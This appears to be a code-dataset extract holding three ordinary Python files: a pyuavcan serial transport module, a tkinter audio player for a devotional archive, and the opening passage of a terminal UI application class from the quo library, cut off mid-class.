source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
_serial.py | #
# Copyright (c) 2019 UAVCAN Development Team
# This software is distributed under the terms of the MIT License.
# Author: Pavel Kirienko <pavel.kirienko@zubax.com>
#
import copy
import typing
import asyncio
import logging
import threading
import dataclasses
import concurrent.futures
import serial
import pyuavcan.transport
from ._frame import SerialFrame
from ._stream_parser import StreamParser
from ._session import SerialOutputSession, SerialInputSession
_SERIAL_PORT_READ_TIMEOUT = 1.0
_logger = logging.getLogger(__name__)
@dataclasses.dataclass
class SerialTransportStatistics(pyuavcan.transport.TransportStatistics):
in_bytes: int = 0
in_frames: int = 0
in_out_of_band_bytes: int = 0
out_bytes: int = 0
out_frames: int = 0
out_transfers: int = 0
out_incomplete: int = 0
class SerialTransport(pyuavcan.transport.Transport):
"""
The serial transport is designed for OSI L1 byte-level serial links, such as RS-485, UART, USB CDC ACM, etc.
Please read the module documentation for details.
"""
DEFAULT_MTU = 1024
VALID_MTU_RANGE = (1024, 1024 * 10)
DEFAULT_SERVICE_TRANSFER_MULTIPLIER = 2
VALID_SERVICE_TRANSFER_MULTIPLIER_RANGE = (1, 5)
def __init__(self,
serial_port: typing.Union[str, serial.SerialBase],
local_node_id: typing.Optional[int],
mtu: int = DEFAULT_MTU,
service_transfer_multiplier: int = DEFAULT_SERVICE_TRANSFER_MULTIPLIER,
baudrate: typing.Optional[int] = None,
loop: typing.Optional[asyncio.AbstractEventLoop] = None):
"""
:param serial_port: The serial port instance to communicate over, or its name.
In the latter case, the port will be constructed via :func:`serial.serial_for_url`
(refer to the PySerial docs for the background).
The new instance takes ownership of the port; when the instance is closed, its port will also be closed.
Examples:
- ``/dev/ttyACM0`` -- a regular serial port on GNU/Linux (USB CDC ACM in this example).
- ``COM9`` -- likewise, on Windows.
- ``/dev/serial/by-id/usb-Black_Sphere_Technologies_Black_Magic_Probe_B5DCABF5-if02`` -- a regular
USB CDC ACM port referenced by the device name and ID (GNU/Linux).
- ``hwgrep:///dev/serial/by-id/*Black_Magic_Probe*-if02`` -- glob instead of exact name.
- ``socket://localhost:50905`` -- a TCP/IP tunnel instead of a physical port.
- ``spy://COM3?file=dump.txt`` -- open a regular port and dump all data exchange into a text file.
Read the PySerial docs for more info.
:param local_node_id: The node-ID to use. Can't be changed after initialization.
None means that the transport will operate in the anonymous mode.
:param mtu: Use single-frame transfers for all outgoing transfers containing not more than than
this many bytes of payload. Otherwise, use multi-frame transfers.
This setting does not affect transfer reception; the RX MTU is hard-coded as ``max(VALID_MTU_RANGE)``.
:param service_transfer_multiplier: Deterministic data loss mitigation is disabled by default.
This parameter specifies the number of times each outgoing service transfer will be repeated.
This setting does not affect message transfers.
:param baudrate: If not None, the specified baud rate will be configured on the serial port.
Otherwise, the baudrate will be left unchanged.
:param loop: The event loop to use. Defaults to :func:`asyncio.get_event_loop`.
"""
self._service_transfer_multiplier = int(service_transfer_multiplier)
self._mtu = int(mtu)
self._loop = loop if loop is not None else asyncio.get_event_loop()
low, high = self.VALID_SERVICE_TRANSFER_MULTIPLIER_RANGE
if not (low <= self._service_transfer_multiplier <= high):
raise ValueError(f'Invalid service transfer multiplier: {self._service_transfer_multiplier}')
low, high = self.VALID_MTU_RANGE
if not (low <= self._mtu <= high):
raise ValueError(f'Invalid MTU: {self._mtu} bytes')
self._local_node_id = int(local_node_id) if local_node_id is not None else None
if self._local_node_id is not None and not (0 <= self._local_node_id < self.protocol_parameters.max_nodes):
raise ValueError(f'Invalid node ID for serial: {self._local_node_id}')
# At first I tried using serial.is_open, but unfortunately that doesn't work reliably because the close()
# method on most serial port classes is non-atomic, which causes all sorts of weird race conditions
# and spurious errors in the reader thread (at least). A simple explicit flag is reliable.
self._closed = False
# For serial port write serialization. Read operations are performed concurrently (no sync) in separate thread.
self._port_lock = asyncio.Lock(loop=loop)
# The serialization buffer is pre-allocated for performance reasons;
# it is needed to store frame contents before they are emitted into the serial port.
# Access must be protected with the port lock!
self._serialization_buffer = bytearray(0 for _ in range(self._mtu * 3))
self._input_registry: typing.Dict[pyuavcan.transport.InputSessionSpecifier, SerialInputSession] = {}
self._output_registry: typing.Dict[pyuavcan.transport.OutputSessionSpecifier, SerialOutputSession] = {}
self._statistics = SerialTransportStatistics()
if not isinstance(serial_port, serial.SerialBase):
serial_port = serial.serial_for_url(serial_port)
assert isinstance(serial_port, serial.SerialBase)
if not serial_port.is_open:
raise pyuavcan.transport.InvalidMediaConfigurationError('The serial port instance is not open')
serial_port.timeout = _SERIAL_PORT_READ_TIMEOUT
self._serial_port = serial_port
if baudrate is not None:
self._serial_port.baudrate = int(baudrate)
self._background_executor = concurrent.futures.ThreadPoolExecutor()
self._reader_thread = threading.Thread(target=self._reader_thread_func, daemon=True)
self._reader_thread.start()
@property
def loop(self) -> asyncio.AbstractEventLoop:
return self._loop
@property
def protocol_parameters(self) -> pyuavcan.transport.ProtocolParameters:
return pyuavcan.transport.ProtocolParameters(
transfer_id_modulo=SerialFrame.TRANSFER_ID_MASK + 1,
max_nodes=len(SerialFrame.NODE_ID_RANGE),
mtu=self._mtu,
)
@property
def local_node_id(self) -> typing.Optional[int]:
return self._local_node_id
def close(self) -> None:
self._closed = True
for s in (*self.input_sessions, *self.output_sessions):
try:
s.close()
except Exception as ex: # pragma: no cover
_logger.exception('%s: Failed to close session %r: %s', self, s, ex)
if self._serial_port.is_open: # Double-close is not an error.
self._serial_port.close()
def get_input_session(self,
specifier: pyuavcan.transport.InputSessionSpecifier,
payload_metadata: pyuavcan.transport.PayloadMetadata) -> SerialInputSession:
def finalizer() -> None:
del self._input_registry[specifier]
self._ensure_not_closed()
try:
out = self._input_registry[specifier]
except LookupError:
out = SerialInputSession(specifier=specifier,
payload_metadata=payload_metadata,
loop=self._loop,
finalizer=finalizer)
self._input_registry[specifier] = out
assert isinstance(out, SerialInputSession)
assert specifier in self._input_registry
assert out.specifier == specifier
return out
def get_output_session(self,
specifier: pyuavcan.transport.OutputSessionSpecifier,
payload_metadata: pyuavcan.transport.PayloadMetadata) -> SerialOutputSession:
self._ensure_not_closed()
if specifier not in self._output_registry:
def finalizer() -> None:
del self._output_registry[specifier]
if isinstance(specifier.data_specifier, pyuavcan.transport.ServiceDataSpecifier) \
and self._service_transfer_multiplier > 1:
async def send_transfer(frames: typing.Iterable[SerialFrame],
monotonic_deadline: float) -> typing.Optional[pyuavcan.transport.Timestamp]:
frames = list(frames)
first_tx_ts: typing.Optional[pyuavcan.transport.Timestamp] = None
for _ in range(self._service_transfer_multiplier): # pragma: no branch
ts = await self._send_transfer(frames, monotonic_deadline)
first_tx_ts = first_tx_ts or ts
return first_tx_ts
else:
send_transfer = self._send_transfer
self._output_registry[specifier] = SerialOutputSession(
specifier=specifier,
payload_metadata=payload_metadata,
mtu=self._mtu,
local_node_id=self._local_node_id,
send_handler=send_transfer,
finalizer=finalizer
)
out = self._output_registry[specifier]
assert isinstance(out, SerialOutputSession)
assert out.specifier == specifier
return out
@property
def input_sessions(self) -> typing.Sequence[SerialInputSession]:
return list(self._input_registry.values())
@property
def output_sessions(self) -> typing.Sequence[SerialOutputSession]:
return list(self._output_registry.values())
@property
def descriptor(self) -> str:
return \
f'<serial baudrate="{self._serial_port.baudrate}" srv_mult="{self._service_transfer_multiplier}">' \
f'{self._serial_port.name}</serial>'
@property
def serial_port(self) -> serial.SerialBase:
assert isinstance(self._serial_port, serial.SerialBase)
return self._serial_port
def sample_statistics(self) -> SerialTransportStatistics:
return copy.copy(self._statistics)
def _handle_received_frame(self, frame: SerialFrame) -> None:
self._statistics.in_frames += 1
if frame.destination_node_id in (self._local_node_id, None):
for source_node_id in {None, frame.source_node_id}:
ss = pyuavcan.transport.InputSessionSpecifier(frame.data_specifier, source_node_id)
try:
session = self._input_registry[ss]
except LookupError:
pass
else:
# noinspection PyProtectedMember
session._process_frame(frame)
def _handle_received_out_of_band_data(self, data: memoryview) -> None:
self._statistics.in_out_of_band_bytes += len(data)
printable: typing.Union[str, bytes] = bytes(data)
try:
assert isinstance(printable, bytes)
printable = printable.decode('utf8')
except ValueError:
pass
_logger.warning('%s: Out-of-band: %s', self._serial_port.name, printable)
def _handle_received_item_and_update_stats(self,
item: typing.Union[SerialFrame, memoryview],
in_bytes_count: int) -> None:
if isinstance(item, SerialFrame):
self._handle_received_frame(item)
elif isinstance(item, memoryview):
self._handle_received_out_of_band_data(item)
else:
assert False
assert self._statistics.in_bytes <= in_bytes_count
self._statistics.in_bytes = int(in_bytes_count)
async def _send_transfer(self, frames: typing.Iterable[SerialFrame], monotonic_deadline: float) \
-> typing.Optional[pyuavcan.transport.Timestamp]:
"""
Emits the frames belonging to the same transfer, returns the first frame transmission timestamp.
The returned timestamp can be used for transfer feedback implementation.
Aborts if the frames cannot be emitted before the deadline or if a write call fails.
:returns: The first frame transmission timestamp if all frames are sent successfully.
None on timeout or on write failure.
"""
tx_ts: typing.Optional[pyuavcan.transport.Timestamp] = None
self._ensure_not_closed()
try: # Jeez this is getting complex
for fr in frames:
async with self._port_lock: # TODO: the lock acquisition should be prioritized by frame priority!
compiled = fr.compile_into(self._serialization_buffer)
timeout = monotonic_deadline - self._loop.time()
if timeout > 0:
self._serial_port.write_timeout = timeout
try:
num_written = await self._loop.run_in_executor(self._background_executor,
self._serial_port.write,
compiled)
tx_ts = tx_ts or pyuavcan.transport.Timestamp.now()
except serial.SerialTimeoutException:
num_written = 0
_logger.info('%s: Port write timed out in %.3fs on frame %r', self, timeout, fr)
self._statistics.out_bytes += num_written or 0
else:
tx_ts = None # Timed out
break
num_written = len(compiled) if num_written is None else num_written
if num_written < len(compiled):
tx_ts = None # Write failed
break
self._statistics.out_frames += 1
except Exception as ex:
if self._closed:
raise pyuavcan.transport.ResourceClosedError(f'{self} is closed, transmission aborted.') from ex
else:
raise
else:
if tx_ts is not None:
self._statistics.out_transfers += 1
else:
self._statistics.out_incomplete += 1
return tx_ts
def _reader_thread_func(self) -> None:
in_bytes_count = 0
def callback(item: typing.Union[SerialFrame, memoryview]) -> None:
self._loop.call_soon_threadsafe(self._handle_received_item_and_update_stats, item, in_bytes_count)
try:
parser = StreamParser(callback, max(self.VALID_MTU_RANGE))
assert abs(self._serial_port.timeout - _SERIAL_PORT_READ_TIMEOUT) < 0.1
while not self._closed and self._serial_port.is_open:
chunk = self._serial_port.read(max(1, self._serial_port.inWaiting()))
timestamp = pyuavcan.transport.Timestamp.now()
in_bytes_count += len(chunk)
parser.process_next_chunk(chunk, timestamp)
except Exception as ex: # pragma: no cover
if self._closed or not self._serial_port.is_open:
_logger.debug('%s: The serial port is closed, exception ignored: %r', self, ex)
else:
_logger.exception('%s: Reader thread has failed, the instance with port %s will be terminated: %s',
self, self._serial_port, ex)
self._closed = True
self._serial_port.close()
finally:
_logger.debug('%s: Reader thread is exiting. Head aega.', self)
def _ensure_not_closed(self) -> None:
if self._closed:
raise pyuavcan.transport.ResourceClosedError(f'{self} is closed')
|
devoaudioplayer.py | import os
import configparser
import time
from tkinter import *
import threading
import tkinter.messagebox
from tkinter import filedialog
from tkinter import ttk
from ttkthemes import themed_tk as tk
from pygame import mixer
from pathlib import Path
from functools import partial
from mutagen.mp3 import MP3
# https://icons8.com/
# Current state
state = {
'file_name' : '',
'paused' : False,
'playing' : False,
'muted' : False,
'previous_vol' : 50,
'play_list' : [],
'frequency' : 44100
}
def pick_theme(theme):
config = configparser.ConfigParser()
config.read('pref.ini')
config['DEFAULT']['Theme'] = theme
with open('pref.ini', 'w') as pref:
config.write(pref)
tkinter.messagebox.showwarning('Theme now set', 'The new theme is now set. '
'Please close this application and reopen '
'it to apply the new style!')
on_closing()
def set_frequency(rate):
state['frequency'] = rate
print('The new frecuency should be : ', rate)
mixer.quit()
mixer.pre_init(frequency=state['frequency'])
mixer.init() # initilizing the mixer
def fileOpen():
state['file_name'] = filedialog.askopenfilename()
add_to_playlist(state['file_name'])
def add_to_playlist(file):
file_name = os.path.basename(file)
song_list_box.insert(END, file_name)
song_list_box.selection_clear(1)
song_list_box.selection_set(0)
state['play_list'].append(file)
def delete_song():
selected_song = song_list_box.curselection()
selected_song_index = int(selected_song[0])
state['play_list'].remove(state['play_list'][selected_song_index])
song_list_box.delete(selected_song_index)
def about():
tkinter.messagebox.showinfo(
'Renewed Hope Devotional Archive Player',
'This app was made by Drew Crawford in 2018 to provide a way to listen '
'to the entire devotional archive, right from your computer. You can '
'contact me at renewedhopeguild@gmail.com with any thoughts or '
'suggestions.\nVersion : 1.0')
def show_details():
if state['file_name'].endswith('mp3'):
mp3_file_info = MP3(state['file_name'])
total_length = mp3_file_info.info.length
else:
sound_obj = mixer.Sound(state['file_name'])
total_length = sound_obj.get_length()
time_format = change_time_format(total_length)
song_length_label['text'] = 'Total length ' + time_format
thread_one = threading.Thread(target=partial(start_count, total_length))
thread_one.start()
def change_time_format(time):
'''Converts the supplied time in miliseconds to a min:sec format'''
mins, secs = divmod(time, 60)
mins = round(mins)
secs = round(secs)
time_format = '{:02d}:{:02d}'.format(mins, secs)
return time_format
def start_count(count):
current_time = 0
# get_busy will return False when the music stops playing
while current_time <= count and mixer.music.get_busy():
if state['paused']:
continue
else:
if current_time >= (count - 1):
print('The current_time is == count')
try:
print('Trying to go to the next song')
current_time = 0
selected_song = song_list_box.curselection()
song_list_box.selection_clear(int(selected_song[0]))
song_list_box.selection_set(int(selected_song[0]) + 1)
print('Just before play, select_song is : ', (int(selected_song[0]) + 1))
play_music()
except:
stop_music()
else:
time_format = change_time_format(current_time)
song_current_time['text'] = 'Current time ' + time_format
time.sleep(1)
current_time += 1
def play_music():
try:
if state['paused']:
# mixer.music.unpause()
state['paused'] = False
state['playing'] = True
mixer.music.play()
load_middle_buttons(state['playing'])
statusbar['text'] = 'Playing : ' + os.path.basename(state['file_name'])
else:
stop_music()
time.sleep(1)
selected_song = song_list_box.curselection()
selected_song_index = int(selected_song[0])
mixer.music.load(state['play_list'][selected_song_index])
state['file_name'] = state['play_list'][selected_song_index]
if state['file_name'].endswith('mp3'):
mp3_file_info = MP3(state['file_name'])
sample_rate = mp3_file_info.info.sample_rate
if sample_rate == state['frequency']:
pass
else:
set_frequency(sample_rate)
mixer.music.load(state['play_list'][selected_song_index])
mixer.music.play()
statusbar['text'] = 'Playing : ' + os.path.basename(state['play_list'][selected_song_index])
state['playing'] = True
load_middle_buttons(state['playing'])
show_details()
except Exception as e:
tkinter.messagebox.showerror(
'Error',
'No file has been selected to play. Click the "File" button at '
'the top and select "Open" to select a file to play from your '
'computer.')
print(e)
def stop_music():
mixer.music.stop()
statusbar['text'] = 'Stopped'
state['playing'] = False
load_middle_buttons(state['playing'])
def pause_music():
if not state['playing']:
pass
elif state['paused']:
mixer.music.unpause()
state['paused'] = False
statusbar['text'] = 'Playing : ' + os.path.basename(state['file_name'])
else:
mixer.music.pause()
statusbar['text'] = 'Paused'
state['paused'] = True
def set_vol(vol):
mixer.music.set_volume(float(vol) * .01)
if not state['muted']:
state['previous_vol'] = (float(vol) * .01)
if mixer.music.get_volume() == 0:
vol_btn.configure(image=mutePhoto)
elif mixer.music.get_volume() <= .33:
vol_btn.configure(image=softPhoto)
elif mixer.music.get_volume() <= .66:
vol_btn.configure(image=mediumPhoto)
else:
vol_btn.configure(image=loudPhoto)
def mute():
if state['muted']:
mixer.music.set_volume(state['previous_vol'])
scale.set((state['previous_vol'] * 100))
state['muted'] = False
if state['previous_vol'] <= .33:
vol_btn.configure(image=softPhoto)
elif state['previous_vol'] <= .66:
vol_btn.configure(image=mediumPhoto)
else:
vol_btn.configure(image=loudPhoto)
else:
mixer.music.set_volume(0)
state['muted'] = True
scale.set(0)
vol_btn.configure(image=mutePhoto)
def load_middle_buttons(playing):
if playing:
backBtn = ttk.Button(middle_frame, image=backPhoto, command=play_music)
backBtn.grid(row=0, column=0, padx=18)
else:
playBtn = ttk.Button(middle_frame, image=playPhoto, command=play_music)
playBtn.grid(row=0, column=0, padx=18)
stopBtn = ttk.Button(middle_frame, image=stopPhoto, command=stop_music)
stopBtn.grid(row=0, column=1, padx=18)
pause_btn =ttk.Button(middle_frame, image=pausePhoto, command=pause_music)
pause_btn.grid(row=0, column=2, padx=18)
def on_closing():
stop_music()
root.destroy()
# Loading the user preferences
config = configparser.ConfigParser()
config.read('pref.ini')
chosen_theme = config['DEFAULT']['Theme']
chosen_frequency = state['frequency']
file_path = Path.cwd() / 'themes' / chosen_theme
# Creating the root window
root = tk.ThemedTk()
root.get_themes()
root.set_theme(chosen_theme)
root.title('Renewed Hope Devotional Archive Player')
root.iconbitmap('music.ico')
# Assign all images
playPhoto = PhotoImage(file=(file_path.joinpath('play.png')))
stopPhoto = PhotoImage(file=(file_path.joinpath('stop.png')))
pausePhoto = PhotoImage(file=(file_path.joinpath('pause.png')))
backPhoto = PhotoImage(file=(file_path.joinpath('back.png')))
mutePhoto = PhotoImage(file=(file_path.joinpath('mute.png')))
softPhoto = PhotoImage(file=(file_path.joinpath('soft.png')))
mediumPhoto = PhotoImage(file=(file_path.joinpath('medium.png')))
loudPhoto = PhotoImage(file=(file_path.joinpath('loud.png')))
# Creating the menubar and adding it to the root window
menuBar = Menu(root)
root.config(menu=menuBar)
# create the first sub menu
subMenu = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label='File', menu=subMenu)
subMenu.add_command(label='Open', command=fileOpen)
subMenu.add_command(label='Exit', command=root.destroy)
# Create the second subMenu
subMenu2 = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label='Theme', menu=subMenu2)
subMenu2.add_command(label='Plastik', command=partial(pick_theme, 'plastik'))
subMenu2.add_command(label='Clear looks', command=partial(pick_theme, 'clearlooks'))
subMenu2.add_command(label='Elegance', command=partial(pick_theme, 'elegance'))
# Create the third subMenu
subMenu3 = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label='Sample Rate', menu=subMenu3)
subMenu3.add_command(label='22.05 kHz', command=partial(set_frequency, 22050))
subMenu3.add_command(label='44.1 kHz', command=partial(set_frequency, 44100))
subMenu3.add_command(label='48 kHz', command=partial(set_frequency, 48000))
subMenu3.add_command(label='96 kHz', command=partial(set_frequency, 96000))
# Create the fourth subMenu
subMenu4 = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label='Help', menu=subMenu4)
subMenu4.add_command(label='About', command=about)
# initilizing the mixer
mixer.pre_init(frequency=chosen_frequency)
mixer.init()
# ============ Creating the left frame =================
left_frame = Frame(root)
left_frame.grid(column=0, row=0)
song_list_box = Listbox(left_frame)
song_list_box.grid(columnspan=2, row=0, padx=30)
add_btn = ttk.Button(left_frame, text='Add', command=fileOpen)
add_btn.grid(column= 0, row=1)
del_btn = ttk.Button(left_frame, text='Delete', command=delete_song)
del_btn.grid(column=1, row=1)
# ============ Creating the right frame =================
right_frame = Frame(root)
right_frame.grid(column=1, row=0)
top_frame = Frame(right_frame)
top_frame.grid(row=0)
song_length_label = ttk.Label(top_frame, text='Total length --:--', font='helvetica 12')
song_length_label.grid(pady=10, row=0)
song_current_time = ttk.Label(top_frame, text='Current time --:--', font='helvetica 12')
song_current_time.grid(row=1)
middle_frame = Frame(right_frame)
middle_frame.grid(pady=15, row=1)
load_middle_buttons(state['playing'])
bottom_frame = Frame(right_frame)
bottom_frame.grid(pady=15, row=2)
vol_btn = ttk.Button(bottom_frame, image=mediumPhoto, command=mute)
vol_btn.grid(row=0, column=0, padx=30)
scale = ttk.Scale(bottom_frame, from_=0, to=100, orient=HORIZONTAL, command=set_vol)
scale.set(50)
mixer.music.set_volume(.5)
scale.grid(row=0, column=1, pady=10)
# ============ Creating the bottom status bar =================
statusbar = ttk.Label(root, text='Welcome to the Renewed Hope Devotional Archive Player', relief=SUNKEN, font='helvetica 12')
statusbar.grid(columnspan=2, sticky=EW)
# Changing the close window functionality
root.protocol('WM_DELETE_WINDOW', on_closing)
root.mainloop() |
suite.py | import asyncio
import os
import re
import signal
import sys
import threading
import time
from asyncio import (
AbstractEventLoop,
CancelledError,
Future,
Task,
ensure_future,
get_event_loop,
new_event_loop,
set_event_loop,
sleep,
)
from contextlib import contextmanager
from subprocess import Popen
from traceback import format_tb
from typing import (
Any,
Awaitable,
Callable,
Dict,
FrozenSet,
Generator,
Generic,
Hashable,
Iterable,
List,
Optional,
Tuple,
Type,
TypeVar,
Union,
cast,
overload,
)
from quo.buffer import Buffer
from quo.i_o.termui import echo
from quo.cache import SimpleCache
from quo.clipboard import Clipboard, InMemoryClipboard
from quo.data_structures import Size
from quo.enums import EditingMode
from quo.eventloop import (
get_traceback_from_context,
run_in_executor_with_context,
)
from quo.eventloop.utils import call_soon_threadsafe
from quo.filters import Condition, Filter, FilterOrBool, to_filter
from quo.text import AnyFormattedText
from quo.input.core import Input
from quo.input.typeahead import get_typeahead, store_typeahead
from quo.keys.key_binding.bindings.page_navigation import (
load_page_navigation_bindings,
)
from quo.keys.key_binding.defaults import load_key_bindings
from quo.keys.key_binding.emacs_state import EmacsState
from quo.keys.key_binding.key_bindings import (
Binding,
ConditionalKeyBindings,
GlobalOnlyKeyBindings,
KeyBindingsBase,
KeysTuple,
merge_key_bindings,
)
from quo.keys.key_binding.key_processor import KeyPressEvent, KeyProcessor
from quo.keys.key_binding.vi_state import ViState
from quo.keys import Keys
from quo.layout import Container, Window
from quo.layout.controls import BufferControl, UIControl
from quo.layout.dummy import create_dummy_layout
from quo.layout.layout import Layout, walk
from quo.output import ColorDepth, Output
from quo.renderer import Renderer, print_formatted_text
from quo.search import SearchState
from quo.styles import (
BaseStyle,
DummyStyle,
DummyStyleTransformation,
DynamicStyle,
StyleTransformation,
default_pygments_style,
default_ui_style,
merge_styles,
)
from quo.utils.utils import Event, in_main_thread
from .current import get_app_session, set_app
from .run_in_terminal import in_terminal, run_in_terminal
try:
import contextvars
except ImportError:
import quo.eventloop.dummy_contextvars as contextvars # type: ignore
#__all__ = [
# "Suite",
#]
E = KeyPressEvent
_AppResult = TypeVar("_AppResult")
# event handler
onSuite = Callable[["Suite[_AppResult]"], None]
_SIGWINCH = getattr(signal, "SIGWINCH", None)
_SIGTSTP = getattr(signal, "SIGTSTP", None)
class Suite(Generic[_AppResult]):
"""
The main Suite class!
This glues everything together.
:param layout: A :class:`~quo.layout.Layout` instance.
:param key_bindings:
:class:`~quo.keys.key_binding.KeyBindingsBase` instance for
the key bindings.
:param clipboard: :class:`~quo.clipboard.Clipboard` to use.
:param full_screen: When True, run the application on the alternate screen buffer.
:param color_depth: Any :class:`~.ColorDepth` value, a callable that
returns a :class:`~.ColorDepth` or `None` for default.
:param erase_when_done: (bool) Clear the application output when it finishes.
:param reverse_vi_search_direction: Normally, in Vi mode, a '/' searches
forward and a '?' searches backward. In Readline mode, this is usually
reversed.
:param min_redraw_interval: Number of seconds to wait between redraws. Use
this for applications where `invalidate` is called a lot. This could cause
a lot of terminal output, which some terminals are not able to process.
`None` means that every `invalidate` will be scheduled right away
(which is usually fine).
When one `invalidate` is called, but a scheduled redraw of a previous
`invalidate` call has not been executed yet, nothing will happen in any
case.
:param max_render_postpone_time: When there is high CPU (a lot of other
scheduled calls), postpone the rendering max x seconds. '0' means:
don't postpone. '.5' means: try to draw at least twice a second.
:param refresh_interval: Automatically invalidate the UI every so many
seconds. When `None` (the default), only invalidate when `invalidate`
has been called.
:param terminal_size_polling_interval: Poll the terminal size every so many
seconds. Useful if the applications runs in a thread other then then
main thread where SIGWINCH can't be handled, or on Windows.
Filters:
:param mouse_support: (:class:`~quo.filters.Filter` or
boolean). When True, enable mouse support.
:param paste_mode: :class:`~quo.filters.Filter` or boolean.
:param editing_mode: :class:`~quo.enums.EditingMode`.
:param enable_page_navigation_bindings: When `True`, enable the page
navigation key bindings. These include both Emacs and Vi bindings like
page-up, page-down and so on to scroll through pages. Mostly useful for
creating an editor or other full screen applications. Probably, you
don't want this for the implementation of a REPL. By default, this is
enabled if `full_screen` is set.
Callbacks (all of these should accept an
:class:`~quo.application.Suite` object as input.)
:param on_reset: Called during reset.
:param on_invalidate: Called when the UI has been invalidated.
:param before_render: Called right before rendering.
:param after_render: Called right after rendering.
I/O:
(Note that the preferred way to change the input/output is by creating an
`AppSession` with the required input/output objects. If you need multiple
applications running at the same time, you have to create a separate
`AppSession` using a `with create_app_session():` block.
:param input: :class:`~quo.input.Input` instance.
:param output: :class:`~quo.output.Output` instance. (Probably
Vt100_Output or Win32Output.)
Usage:
app = Suite(...)
app.run()
# Or
await app.run_async()
"""
def __init__(
self,
layout: Optional[Layout] = None,
style: Optional[BaseStyle] = None,
include_default_pygments_style: FilterOrBool = True,
style_transformation: Optional[StyleTransformation] = None,
key_bindings: Optional[KeyBindingsBase] = None,
clipboard: Optional[Clipboard] = None,
full_screen: bool = False,
color_depth: Union[
ColorDepth, Callable[[], Union[ColorDepth, None]], None
] = None,
mouse_support: FilterOrBool = False,
enable_page_navigation_bindings: Optional[
FilterOrBool
] = None, # Can be None, True or False.
paste_mode: FilterOrBool = False,
editing_mode: EditingMode = EditingMode.EMACS,
erase_when_done: bool = False,
reverse_vi_search_direction: FilterOrBool = False,
min_redraw_interval: Union[float, int, None] = None,
max_render_postpone_time: Union[float, int, None] = 0.01,
refresh_interval: Optional[float] = None,
terminal_size_polling_interval: Optional[float] = 0.5,
on_reset: Optional[onSuite] = None,
on_invalidate: Optional[onSuite] = None,
before_render: Optional[onSuite] = None,
after_render: Optional[onSuite] = None,
# I/O.
input: Optional[Input] = None,
output: Optional[Output] = None,
) -> None:
# If `enable_page_navigation_bindings` is not specified, enable it in
# case of full screen applications only. This can be overridden by the user.
if enable_page_navigation_bindings is None:
enable_page_navigation_bindings = Condition(lambda: self.full_screen)
paste_mode = to_filter(paste_mode)
mouse_support = to_filter(mouse_support)
reverse_vi_search_direction = to_filter(reverse_vi_search_direction)
enable_page_navigation_bindings = to_filter(enable_page_navigation_bindings)
include_default_pygments_style = to_filter(include_default_pygments_style)
if layout is None:
layout = create_dummy_layout()
if style_transformation is None:
style_transformation = DummyStyleTransformation()
self.style = style
self.style_transformation = style_transformation
# Key bindings.
self.key_bindings = key_bindings
self._default_bindings = load_key_bindings()
self._page_navigation_bindings = load_page_navigation_bindings()
self.layout = layout
self.clipboard = clipboard or InMemoryClipboard()
self.full_screen: bool = full_screen
self._color_depth = color_depth
self.mouse_support = mouse_support
self.paste_mode = paste_mode
self.editing_mode = editing_mode
self.erase_when_done = erase_when_done
self.reverse_vi_search_direction = reverse_vi_search_direction
self.enable_page_navigation_bindings = enable_page_navigation_bindings
self.min_redraw_interval = min_redraw_interval
self.max_render_postpone_time = max_render_postpone_time
self.refresh_interval = refresh_interval
self.terminal_size_polling_interval = terminal_size_polling_interval
# Events.
self.on_invalidate = Event(self, on_invalidate)
self.on_reset = Event(self, on_reset)
self.before_render = Event(self, before_render)
self.after_render = Event(self, after_render)
# I/O.
session = get_app_session()
self.output = output or session.output
self.input = input or session.input
# List of 'extra' functions to execute before a Suite.run.
self.pre_run_callables: List[Callable[[], None]] = []
self._is_running = False
self.future: Optional[Future[_AppResult]] = None
self.loop: Optional[AbstractEventLoop] = None
self.context: Optional[contextvars.Context] = None
#: Quoted insert. This flag is set if we go into quoted insert mode.
self.quoted_insert = False
#: Vi state. (For Vi key bindings.)
self.vi_state = ViState()
self.emacs_state = EmacsState()
#: When to flush the input (For flushing escape keys.) This is important
#: on terminals that use vt100 input. We can't distinguish the escape
#: key from for instance the left-arrow key, if we don't know what follows
#: after "\x1b". This little timer will consider "\x1b" to be escape if
#: nothing did follow in this time span.
#: This seems to work like the `ttimeoutlen` option in Vim.
self.ttimeoutlen = 0.5 # Seconds.
#: Like Vim's `timeoutlen` option. This can be `None` or a float. For
#: instance, suppose that we have a key binding AB and a second key
#: binding A. If the uses presses A and then waits, we don't handle
#: this binding yet (unless it was marked 'eager'), because we don't
#: know what will follow. This timeout is the maximum amount of time
#: that we wait until we call the handlers anyway. Pass `None` to
#: disable this timeout.
self.timeoutlen = 1.0
#: The `Renderer` instance.
# Make sure that the same stdout is used, when a custom renderer has been passed.
self._merged_style = self._create_merged_style(include_default_pygments_style)
self.renderer = Renderer(
self._merged_style,
self.output,
full_screen=full_screen,
mouse_support=mouse_support,
cpr_not_supported_callback=self.cpr_not_supported_callback,
)
#: Render counter. This one is increased every time the UI is rendered.
#: It can be used as a key for caching certain information during one
#: rendering.
self.render_counter = 0
# Invalidate flag. When 'True', a repaint has been scheduled.
self._invalidated = False
self._invalidate_events: List[
Event[object]
] = [] # Collection of 'invalidate' Event objects.
self._last_redraw_time = 0.0 # Unix timestamp of last redraw. Used when
# `min_redraw_interval` is given.
#: The `InputProcessor` instance.
self.key_processor = KeyProcessor(_CombinedRegistry(self))
# If `run_in_terminal` was called. This will point to a `Future` what will be
# set at the point when the previous run finishes.
self._running_in_terminal = False
self._running_in_terminal_f: Optional[Future[None]] = None
# Trigger initialize callback.
self.reset()
def _create_merged_style(self, include_default_pygments_style: Filter) -> BaseStyle:
"""
Create a `Style` object that merges the default UI style, the default
pygments style, and the custom user style.
"""
dummy_style = DummyStyle()
pygments_style = default_pygments_style()
@DynamicStyle
def conditional_pygments_style() -> BaseStyle:
if include_default_pygments_style():
return pygments_style
else:
return dummy_style
return merge_styles(
[
default_ui_style(),
conditional_pygments_style,
DynamicStyle(lambda: self.style),
]
)
@property
def color_depth(self) -> ColorDepth:
"""
The active :class:`.ColorDepth`.
The current value is determined as follows:
- If a color depth was given explicitly to this application, use that
value.
- Otherwise, fall back to the color depth that is reported by the
:class:`.Output` implementation. If the :class:`.Output` class was
created using `output.defaults.create_output`, then this value is
coming from the $PROMPT_TOOLKIT_COLOR_DEPTH environment variable.
"""
depth = self._color_depth
if callable(depth):
depth = depth()
if depth is None:
depth = self.output.get_default_color_depth()
return depth
@property
def current_buffer(self) -> Buffer:
